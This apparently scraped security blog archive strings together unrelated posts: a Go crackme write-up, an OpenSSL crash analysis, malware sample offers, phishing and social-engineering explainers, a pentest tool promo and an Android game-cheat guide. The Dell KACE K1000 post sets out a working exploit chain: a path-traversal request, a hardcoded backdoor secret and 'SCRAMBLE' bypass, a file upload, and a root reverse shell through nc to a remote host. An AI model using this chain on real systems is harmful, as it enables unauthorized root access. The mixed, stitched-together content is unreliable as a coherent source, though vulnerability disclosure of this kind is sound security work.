2020. április 25., szombat

inBINcible Writeup - Golang Binary Reversing

This file is an 32bits elf binary, compiled from go language (i guess ... coded by @nibble_ds ;)
The binary has some debugging symbols, which is very helpful to locate the functions and api calls.

GO source functions:
-  main.main
-  main.function.001

If the binary is executed with no params, it prints "Nope!", the bad guy message.

~/ncn$ ./inbincible 

Decompiling the main.main function I saw two things:

1. The Argument validation: Only one 16 bytes long argument is needed, otherwise the execution is finished.

2. The key IF, the decision to dexor and print byte by byte the "Nope!" string OR dexor and print "Yeah!"

The incoming channel will determine the final message.

Dexor and print each byte of the "Nope!" message.

This IF, checks 16 times if the go channel reception value is 0x01, in this case the app show the "Yeah!" message.

Go channels are a kind of thread-safe queue, a channel_send is like a push, and channel_receive is like a pop.

If we fake this IF the 16 times, we got the "Yeah!" message:

(gdb) b *0x8049118
(gdb) commands
>set {char *}0xf7edeef3 = 0x01

(gdb) r 1234567890123456
tarting program: /home/sha0/ncn/inbincible 1234567890123456

Ok, but the problem is not in main.main, is main.function.001 who must sent the 0x01 via channel.
This function xors byte by byte the input "1234567890123456" with a byte array xor key, and is compared with another byte array.

=> 0x8049456:       xor    %ebp,%ecx
This xor,  encode the argument with a key byte by byte

The xor key can be dumped from memory but I prefer to use this macro:

(gdb) b *0x8049456
(gdb) commands
>i r  ecx
(gdb) c

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x12 18

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x45 69

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x33 51

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x87 135

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x65 101

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x12 18

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x45 69

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x33 51

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x87 135

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x65 101

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x12 18

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x45 69

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x33 51

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x87 135

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x65 101

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x12 18

The result of the xor will compared with another array byte,  each byte matched, a 0x01 will be sent.

The cmp of the xored argument byte,
will determine if the channel send 0 or 1

(gdb) b *0x0804946a
(gdb) commands
>i r al

At this point we have the byte array used to xor the argument, and the byte array to be compared with, if we provide an input that xored with the first byte array gets the second byte array, the code will send 0x01 by the channel the 16 times.

Now web have:



Xor is reversible, then we can get the input needed to dexor to the expected values in order to send 0x1 bytes through the go channel.

>>> x=''
>>> for i in range(len(xorKey)):
...     x+= chr(xorKey[i] ^ mustGive[i])
>>> print x


And that's the key :) let's try it:

~/ncn$ ./inbincible 'G0w1n!C0ngr4t5!!'

Got it!! thanx @nibble_ds for this funny crackme, programmed in the great go language. I'm also a golang lover.

Continue reading

TLS V1.2 Sigalgs Remote Crash (CVE-2015-0291)

OpenSSL 1.0.2a fix several security issues, one of them let crash TLSv1.2 based services remotelly from internet.

Regarding to the TLSv1.2 RFC,  this version of TLS provides a "signature_algorithms" extension for the client_hello. 

Data Structures

If a bad signature is sent after the renegotiation, the structure will be corrupted, becouse structure pointer:
s->c->shared_sigalgs will be NULL, and the number of algorithms:
s->c->shared_sigalgslen will not be zeroed.
Which will be interpreted as one algorithm to process, but the pointer points to 0x00 address. 

Then tls1_process_sigalgs() will try to process one signature algorithm (becouse of shared_sigalgslen=1) then sigptr will be pointer to c->shared_sigalgs (NULL) and then will try to derreference sigptr->rhash. 

This mean a Segmentation Fault in  tls1_process_sigalgs() function, and called by tls1_set_server_sigalgs() with is called from ssl3_client_hello() as the stack trace shows.


The following code, points sigptr to null and try to read sigptr->rsign, which is assembled as movzbl eax,  byte ptr [0x0+R12] note in register window that R12 is 0x00

Debugger in the crash point.

radare2 static decompiled

The patch fix the vulnerability zeroing the sigalgslen.
Get  David A. Ramos' proof of concept exploit here

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2020. április 24., péntek

"I Am Lady" Linux.Lady Trojan Samples

Bitcoin mining malware for Linux servers - samples
Research: Dr. Web. Linux.Lady

Sample Credit:  Tim Strazzere

MD5 list:


Download. Email me if you need the password.

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2020. április 23., csütörtök

Breaking Down Business Email Compromise

What is a Business Email Compromise and why should cyber security professionals care?

Author: Keith Roberts, Senior Information Security Analyst

The FBI categorizes business email compromise (BEC) scams into three specific brands. While there are certainly hybrid forms, for this article we are focusing on the big three. Today we're going to dive into the "Account Compromise" BEC attack.

Account compromise

Company A has an employee email account compromised. Fake invoices are sent to company B, which is in a business relationship with Company A. The invoices will fool all but the savviest of finance team members. Prevention should include process review from the finance team.

The "fake invoice" scam (otherwise known as Vendor Email Compromise)

Fraudsters research a target organization. They send the target organization an invoice requesting payment from a company that the target does business with. Though not as efficient as the next tactic, it is much easier to pull off

CEO fraud

Criminals spoof an organization's domain and send emails appearing to originate from the CEO to high risk employees (finance, HR, executives), usually asking for a "wire transfer," though this attack is not limited to only wire transfer requests.

The Four Phases of Account Compromise Attacks

Phase 1– Initial Compromise

 I've seen many Account Compromise BEC attacks in the past five years through industry peers and personal experience. Some were very well crafted and were caught only by well-trained eyes, others poorly written and containing many clues to their illegitimacy – these unfortunately do succeed. Almost all these BEC attacks started with a simple landing page.

Figure 1: Spoofed 0365 Login Page

An employee at company A was phished with a credential harvesting email. The recipient entered their credentials and now the criminal has control of that email account. The preparation can take months while the fraudster gathers intelligence on the target using open source gathering from social media sites and online searching. This opening phase is arguably the most important in the hacker's attack – underpreparation comes with the risk of a failed operation.

This phish would have been one of two types:

  • Specifically crafted with research into the targets company, colleagues and business partners of the victim.
  • Opportunistic mass phish, where the attacker casts a wide net hoping for a bite.

Phase 2 of the Attack – Waiting

Now the hacker sits and waits, observing the email traffic coming in and out of the account. They may have set an auto forward rule into the victim's email – this way they can slip into an email thread without the victim knowing, collecting information such as:

  • Invoices, payment slips
  • Employee names and contact information
  • Names of colleagues in the victim(s) department
  • Payment cadence
  • Email tone and punctuation between company representatives

The perpetrator is gathering intelligence and waiting for the perfect time to execute the next phase of the attack. The attacker needs to understand the victim organizations entire workflow. Payment schedules are noted here because if the fraudster send an invoice before one is due, that would draw unwanted attention to the attack. The goal here is to observe transactions, conversations, and exchanges taking place within that compromised email account. This is crucial for when the fake email is created to the point of being undetectable.

Phase 3 of the Attack – The Switch

The third phase will involve the criminal sending an email from company A's compromised email account to a finance employee at company B. If they're good at what they do, the fake invoice will be near perfect, with minor changes including address, bank account, routing number and phone number. The hacker could have been sitting on communications from company B if they were auto forwarded to his/her account. So, the subject line could read something like "URGENT: LATE PAYMENT" or "PAYMENT NOT RECEIVED" and finally "NOTICE OF BANK CHANGE". This tactic is intended for the recipient to elicit an emotional response.

Figure 2:Original Invoice on the Left – Altered Invoice on the Right

Phase 4 of the Attack – Financial Fraud

Urgency can leave the recipient in a panicked state and they don't always see the clear mistakes in the email body and on the invoice. This is where the company B employee makes a payment to the criminal's bank account. Though things did not add up, the proper verifications were not checked, and the payment was made. This can often leave both companies involved in the fraud in a financial and potentially legal bind, but more on that later.

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KillShot: A PenTesting Framework, Information Gathering Tool And Website Vulnerabilities Scanner

Why should i use KillShot?
   You can use this tool to Spider your website and get important information and gather information automaticaly using whatweb-host-traceroute-dig-fierce-wafw00f or to Identify the cms and to find the vulnerability in your website using Cms Exploit Scanner && WebApp Vul Scanner Also You can use killshot to Scan automaticly multiple type of scan with nmap and unicorn . And With this tool You can Generate PHP Simple Backdoors upload it manual and connect to the target using killshot

   This Tool Bearing A simple Ruby Fuzzer Tested on VULSERV.exe and Linux Log clear script To change the content of login paths Spider can help you to find parametre of the site and scan XSS and SQL.

Use Shodan By targ option
   CreateAccount Here Register and get Your aip Shodan AIP And Add your shodan AIP to aip.txt < only your aip should be show in the aip.txt > Use targ To search about Vulnrable Targets in shodan databases.

   Use targ To scan Ip of servers fast with Shodan.

KillShot's Installation
   For Linux users, open your Terminal and enter these commands:   If you're a Windows user, follow these steps:
  • First, you must download and run Ruby-lang setup file from RubyInstaller.org, choose Add Ruby executables to your PATH and Use UTF-8 as default external encoding.
  • Then, download and install curl (32-bit or 64-bit) from Curl.haxx.se/windows. After that, go to Nmap.org/download.html to download and install the lastest Nmap version.
  • Download killshot-master.zip and unzip it.
  • Open CMD or PowerShell window at the KillShot folder you've just unzipped and enter these commands:
    ruby setup.rb
    ruby killshot.rb

KillShot usage examples
   Easy and fast use of KillShot:

   Use KillShot to detect and scan CMS vulnerabilities (Joomla and WordPress) and scan for XSS and SQL:

References: Vulnrabilities are taken from

More info

CEH: Fundamentals Of Social Engineering

Social engineering is a nontechnical method of breaking into a system or network. It's the process of deceiving users of a system and convincing them to perform acts useful to the hacker, such as giving out information that can be used to defeat or bypass security mechanisms. Social engineering is important to understand because hackers can use it to attack the human element of a system and circumvent technical security measures. This method can be used to gather information before or during an attack.

A social engineer commonly uses the telephone or Internet to trick people into revealing sensitive information or to get them to do something that is against the security policies of the organization. By this method, social engineers exploit the natural tendency of a person to trust their word, rather than exploiting computer security holes. It's generally agreed that users are the weak link in security; this principle is what makes social engineering possible.

The most dangerous part of social engineering is that companies with authentication processes, firewalls, virtual private networks, and network monitoring software are still wide open to attacks, because social engineering doesn't assault the security measures directly. Instead, a social-engineering attack bypasses the security measures and goes after the human element in an organization.

Types of Social Engineering-Attacks

There are two types of Social Engineering attacks


Human-based social engineering refers to person-to-person interaction to retrieve the desired information. An example is calling the help desk and trying to find out a password.


​Computer-based social engineering refers to having computer software that attempts to retrieve the desired information. An example is sending a user an email and asking them to reenter a password in a web page to confirm it. This social-engineering attack is also known as phishing.

Human-Based Social Engineering

Human-Based further categorized as follow:

Impersonating an Employee or Valid User

In this type of social-engineering attack, the hacker pretends to be an employee or valid user on the system. A hacker can gain physical access by pretending to be a janitor, employee, or contractor. Once inside the facility, the hacker gathers information from trashcans, desktops, or computer systems.

Posing as an Important User

In this type of attack, the hacker pretends to be an important user such as an executive or high-level manager who needs immediate assistance to gain access to a computer system or files. The hacker uses intimidation so that a lower-level employee such as a help desk worker will assist them in gaining access to the system. Most low-level employees won't question someone who appears to be in a position of authority.

Using a Third Person

Using the third-person approach, a hacker pretends to have permission from an authorized source to use a system. This attack is especially effective if the supposed authorized source is on vacation or can't be contacted for verification.

Calling Technical Support

Calling tech support for assistance is a classic social-engineering technique. Help desk and technical support personnel are trained to help users, which makes them good prey for social-engineering attacks.

Shoulder Surfing 

Shoulder surfing is a technique of gathering passwords by watching over a person's shoulder while they log in to the system. A hacker can watch a valid user log in and then use that password to gain access to the system.

Dumpster Diving

Dumpster diving involves looking in the trash for information written on pieces of paper or computer printouts. The hacker can often find passwords, filenames, or other pieces of confidential information.

Computer-Based Social Engineering

Computer-based social-engineering attacks can include the following:
  • Email attachments
  • Fake websites
  • Pop-up windows

Insider Attacks

If a hacker can't find any other way to hack an organization, the next best option is to infiltrate the organization by getting hired as an employee or finding a disgruntled employee to assist in the attack. Insider attacks can be powerful because employees have physical access and are able to move freely about the organization. An example might be someone posing as a delivery person by wearing a uniform and gaining access to a delivery room or loading dock. Another possibility is someone posing as a member of the cleaning crew who has access to the inside of the building and is usually able to move about the offices. As a last resort, a hacker might bribe or otherwise coerce an employee to participate in the attack by providing information such as passwords.

Identity Theft

A hacker can pose as an employee or steal the employee's identity to perpetrate an attack. Information gathered in dumpster diving or shoulder surfing in combination with creating fake ID badges can gain the hacker entry into an organization. Creating a persona that can enter the building unchallenged is the goal of identity theft.

Phishing Attacks

Phishing involves sending an email, usually posing as a bank, credit card company, or other financial organization. The email requests that the recipient confirm banking information or reset passwords or PINs. The user clicks the link in the email and is redirected to a fake website. The hacker is then able to capture this information and use it for financial gain or to perpetrate other attacks. Emails that claim the senders have a great amount of money but need your help getting it out of the country are examples of phishing attacks. These attacks prey on the common person and are aimed at getting them to provide bank account access codes or other confidential information to the hacker.

Online Scams

Some websites that make free offers or other special deals can lure a victim to enter a username and password that may be the same as those they use to access their work system.
The hacker can use this valid username and password once the user enters the information in the website form. Mail attachments can be used to send malicious code to a victim's system, which could automatically execute something like a software keylogger to capture passwords. Viruses, Trojans, and worms can be included in cleverly crafted emails to entice a victim to open the attachment. Mail attachments are considered a computer-based social-engineering attack.Related news

2020. április 22., szerda

The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:
POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
; About php.ini   ;
That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:
This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:
    private static function calcTokenChecksum($filename, $machineId, $mac)
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksumcheck, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  
 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").

The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:
    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 
Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
On our host:
    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:
Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1
That all adds up to owned last time I checked.

Example PoC can be found at the following location:

Example usage can be seen below:

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2020. április 21., kedd

Thank You To Volunteers And Board Members That Worked BlackHat Booth 2019

The OWASP Foundation would like to thank the OWASP Las Vegas Chapter Volunteers for taking the time out of their busy schedule to give back and volunteer to work the booth at BlackHat 2019.  It was great meeting our Las Vegas OWASP members and working with Jorge, Carmi, Dave, and Nancy.  
Also, take a moment to thank Global Board Members Martin Knobloch, Owen Pendlebury, and Gary Robinson for also working the booth and speaking with individuals and groups to answer questions on projects and suggestions on the use of our tools to address their work problems.
OWASP can not exist without support from our members.  

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2020. április 20., hétfő

How To Hack Any Game On Your Android Smartphone

How To Hack Any Game On Android 2018

How To Hack Any Game On Your Android Smartphone

By hacking android game you can unlock all the levels, use any resource according to your wish and lots more. Proceed with the method shown below to hack any game on your Android. But sometimes while playing our favorite game we get short on our resources that are needed to play that game, like power, weapons or lives etc. That consequence really becomes bothersome, so to overcome this we are here with the trick How To Hack Any Game On Android.

Today millions of character are using the android phone. Now an Android device enhances significant part of our life. Everyone loves to play games on their android device. There are lots of cool games that are today available on your Android device in Google Play Store.

How To Hack Any Game On Android 2018

Hack Any Game On Android
How To Hack Any Game On Your Android Smartphone
Now it's time to hack into the game and use any resources that you want to play at any level of the game. The method is really working and will let you alter the game according to your wish. Just proceed with simple steps below.

Steps To Hack Any Game On Android

Step 1. First of all after rooting your android device open the GameCIH App. It will ask you for superuser access, grant it.(This will only come if you have properly rooted your android device. Now on the home screen of this app, you will see Hot-Key option, select any of them which you feel more convenient while using in your android.
Hack Any Game On Android
How To Hack Any Game On Your Android Smartphone
Step 2. Now open the game that you want to hack into your android device. Now pause the game and access the hotkeys displaying there, select any value that you want to edit in your game. Like any of text value like keys of subway surfer game.
Hack Any Game On Android.2
How To Hack Any Game On Your Android Smartphone
Step 3. Enter your desired value in the text field box appeared there and click on done. Now you will see default value will get replaced with your value. Similarly, you can alter any values in any of the game according to your wish.
Hack Any Game On Android.3
How To Hack Any Game On Your Android Smartphone
That's it game hacking is done, Now you can access any resources using this hack.
So above is all about Hack Any Game On Android. With the help of this trick, you can alter any coins, lives, money, weapons power and lots more in any of your favorite android game and can enjoy the unlimited game resources according to your wish.

Using Game Guardian

Game Guardian Apk is one of the best apps which you can have on your Android smartphone. With the help of this app, you can easily get unlimited coins, gems and can perform all other hacks. However, Game Guardian Apk needs a rooted Android smartphone to work. Here's a simple guide that will help you.
Step 1. First of all, you need to download the latest version of Game Guardian on your Android smartphone from the given download link above or below.
Step 2. After downloading on your smartphone, you need to enable the Unknown Source on your device. For that, you need to visit Settings > Security > Unknown Sources
Using Game Guardian
Using Game Guardian
Step 3. Now install the app and then press the home button to minimize the app. Now open any game that you want to hack. You will see an overlay of Game Guardian App icon. Tap on it.
Step 4. Now you need to tap on the Search Button and set the value. If you don't know the values, then simply set it to auto.
Using Game Guardian
Using Game Guardian
Step 5. You need to search for the value which you want to hack like money, gem, health, score etc. You can change all those values. Suppose, if you need to decrease the number of values, you need to scan again for the new value.
Using Game Guardian
Using Game Guardian
Step 6. Finally, you need to select all the values and then change it to infinite numbers like '9999999' or whatever you want.
Using Game Guardian
Using Game Guardian
That's it, you are done! This is how you can use Game Guardian Apk to hack games on your Android smartphone.
With this, you can play a game at any levels without any shortage of any resource that can interrupt your gameplay. Hope you like this coolest android game hack. Don't forget to share it with others too.
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